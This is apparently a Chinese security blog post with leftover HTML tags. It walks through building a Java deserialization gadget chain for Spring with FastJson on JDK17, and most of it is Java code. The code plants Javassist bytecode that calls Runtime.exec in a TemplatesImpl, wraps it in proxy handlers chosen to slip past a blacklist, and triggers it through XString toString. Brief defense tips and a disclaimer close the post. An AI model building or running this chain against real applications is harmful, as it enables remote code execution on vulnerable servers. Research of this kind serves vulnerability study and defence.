Spring + FastJson 反序列化漏洞利用分析（JDK17 环境）<\/h1>

0x01 背景与问题分析<\/h2>

核心问题<\/h3>

在 JDK17 环境下，传统的反序列化利用方式面临两个主要问题：<\/p>

模块系统限制<\/strong>：JDK17 的模块系统限制了跨模块的访问，导致传统利用链失效<\/li>

serialVersionUID 不一致<\/strong>：高低版本 Spring 的 AOP 组件以及某些类的 serialVersionUID 不一致，导致反序列化失败<\/li> <\/ol>
解决方案思路<\/h3>

使用 JdkDynamicAopProxy<\/code> 代理 javax.xml.transform.Templates<\/code>，通过 AOP 让调用发生在同一模块内<\/li>
寻找在 JDK8 和 JDK17 上 serialVersionUID 一致的触发头，避免版本兼容性问题<\/li> <\/ol> 0x02 关键技术点<\/h2> 1. 使用 XString 触发 toString<\/h3> com.sun.org.apache.xpath.internal.objects.XString<\/code> 及其子类在 JDK8 和 JDK17 上有相同的 serialVersionUID，可用于触发 toString：<\/p> Class<?><\/span> aClass1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.org.apache.xpath.internal.objects.XStringForChars"<\/span>);<\/span> <\/span><\/span>Object xstring =<\/span> utils.<\/span>createWithoutConstructor<\/span>(<\/span>aClass1);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>xstring,<\/span> "m_obj"<\/span>,<\/span> new<\/span> char<\/span>[]{});<\/span> <\/span><\/span> <\/span><\/span>HashMap hashMap1 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>HashMap hashMap2 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>hashMap1.<\/span>put<\/span>(<\/span>"通话"<\/span>,<\/span> xstring);<\/span> <\/span><\/span>hashMap1.<\/span>put<\/span>(<\/span>"重地"<\/span>,<\/span> node);<\/span> <\/span><\/span>hashMap2.<\/span>put<\/span>(<\/span>"重地"<\/span>,<\/span> xstring);<\/span> <\/span><\/span>hashMap2.<\/span>put<\/span>(<\/span>"通话"<\/span>,<\/span> node);<\/span> <\/span><\/span>HashMap map =<\/span> utils.<\/span>makeMap<\/span>(<\/span>hashMap1,<\/span> hashMap2);<\/span> <\/span><\/span><\/code><\/pre>2. 替代 JdkDynamicAopProxy<\/h3> 当 JdkDynamicAopProxy<\/code> 在黑名单中时，可使用 ObjectFactoryDelegatingInvocationHandler<\/code>：<\/p> HashMap hashMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"object"<\/span>,<\/span> templates);<\/span> <\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject(<\/span>hashMap);<\/span> <\/span><\/span> <\/span><\/span>Object o2 =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> <\/span><\/span> jsonObject <\/span><\/span>);<\/span> <\/span><\/span> <\/span><\/span>Object inv =<\/span> utils.<\/span>createWithoutConstructor<\/span>(<\/span> <\/span><\/span> "org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler"<\/span> <\/span><\/span>);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>inv,<\/span> "objectFactory"<\/span>,<\/span> o2);<\/span> <\/span><\/span> <\/span><\/span>Object o =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> <\/span><\/span> (<\/span>InvocationHandler)<\/span>inv <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre>3. FastJson 的特殊处理<\/h3> FastJson 1.2.48+ 使用 SecureObjectInputStream<\/code> 进行反序列化，需要添加 JVM 参数：<\/p> --add-opens java.base\/java.lang=ALL-UNNAMED --add-opens java.base\/java.io=ALL-UNNAMED <\/code><\/pre> 0x03 完整利用链构造<\/h2> 1. 准备 TemplatesImpl<\/h3> ClassPool pool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span>CtClass cc =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Cat"<\/span>);<\/span> <\/span><\/span>String cmd =<\/span> "java.lang.Runtime.getRuntime().exec(\"open .\");"<\/span>;<\/span> <\/span><\/span>cc.<\/span>makeClassInitializer<\/span>().<\/span>insertBefore<\/span>(<\/span>cmd);<\/span> <\/span><\/span>byte<\/span>[]<\/span> classBytes =<\/span> cc.<\/span>toBytecode<\/span>();<\/span> <\/span><\/span> <\/span><\/span>CtClass ctClass1 =<\/span> pool.<\/span>makeClass<\/span>(<\/span>"Foo"<\/span>);<\/span> <\/span><\/span>Class<?><\/span> aClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>);<\/span> <\/span><\/span>Object templates =<\/span> utils.<\/span>createWithoutConstructor<\/span>(<\/span>aClass);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "n1ght"<\/span>);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>classBytes,<\/span> ctClass1.<\/span>toBytecode<\/span>()});<\/span> <\/span><\/span><\/code><\/pre>2. 构造代理链<\/h3> HashMap hashMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>"object"<\/span>,<\/span> templates);<\/span> <\/span><\/span>JSONObject jsonObject =<\/span> new<\/span> JSONObject(<\/span>hashMap);<\/span> <\/span><\/span> <\/span><\/span>Object o2 =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> <\/span><\/span> jsonObject <\/span><\/span>);<\/span> <\/span><\/span> <\/span><\/span>Object inv =<\/span> utils.<\/span>createWithoutConstructor<\/span>(<\/span> <\/span><\/span> "org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler"<\/span> <\/span><\/span>);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>inv,<\/span> "objectFactory"<\/span>,<\/span> o2);<\/span> <\/span><\/span> <\/span><\/span>Object o =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span> <\/span><\/span> (<\/span>InvocationHandler)<\/span>inv <\/span><\/span>);<\/span> <\/span><\/span><\/code><\/pre>3. 构造触发链<\/h3> JSONArray objects =<\/span> new<\/span> JSONArray();<\/span> <\/span><\/span>objects.<\/span>add<\/span>(<\/span>o);<\/span> <\/span><\/span> <\/span><\/span>Class<?><\/span> aClass1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.org.apache.xpath.internal.objects.XStringForChars"<\/span>);<\/span> <\/span><\/span>Object xstring =<\/span> utils.<\/span>createWithoutConstructor<\/span>(<\/span>aClass1);<\/span> <\/span><\/span>utils.<\/span>setFieldValue<\/span>(<\/span>xstring,<\/span> "m_obj"<\/span>,<\/span> new<\/span> char<\/span>[]{});<\/span> <\/span><\/span> <\/span><\/span>HashMap hashMap1 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>HashMap hashMap2 =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>hashMap1.<\/span>put<\/span>(<\/span>"通话"<\/span>,<\/span> xstring);<\/span> <\/span><\/span>hashMap1.<\/span>put<\/span>(<\/span>"重地"<\/span>,<\/span> objects);<\/span> <\/span><\/span>hashMap2.<\/span>put<\/span>(<\/span>"重地"<\/span>,<\/span> xstring);<\/span> <\/span><\/span>hashMap2.<\/span>put<\/span>(<\/span>"通话"<\/span>,<\/span> objects);<\/span> <\/span><\/span> <\/span><\/span>HashMap map =<\/span> utils.<\/span>makeMap<\/span>(<\/span>hashMap1,<\/span> hashMap2);<\/span> <\/span><\/span>ArrayList arrayList =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span>arrayList.<\/span>add<\/span>(<\/span>templates);<\/span> <\/span><\/span>arrayList.<\/span>add<\/span>(<\/span>o);<\/span> <\/span><\/span>arrayList.<\/span>add<\/span>(<\/span>map);<\/span> <\/span><\/span><\/code><\/pre>4. 序列化与反序列化<\/h3> byte<\/span>[]<\/span> serialize =<\/span> utils.<\/span>serialize<\/span>(<\/span>arrayList);<\/span> <\/span><\/span>utils.<\/span>unserialize<\/span>(<\/span>Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>"BASE64_ENCODED_PAYLOAD"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>0x04 注意事项<\/h2> 环境要求<\/strong>：需要 Spring + FastJson 环境<\/li> JDK 版本<\/strong>：该方法在 JDK17 环境下测试通过<\/li> 模块开放<\/strong>：需要目标应用开放相应的模块访问权限<\/li> 依赖版本<\/strong>：需要注意 Spring 和 FastJson 的版本兼容性<\/li> <\/ol> 0x05 防御建议<\/h2> 检查并过滤反序列化数据流<\/li> 使用安全的反序列化框架或方法<\/li> 限制 JVM 的模块开放权限<\/li> 及时更新相关组件的安全补丁<\/li> <\/ol> 参考资源<\/h2> FastJson 与原生反序列化<\/a><\/li> <\/ul> 本文仅用于安全研究和技术教育目的，请勿用于非法用途。<\/em><\/p>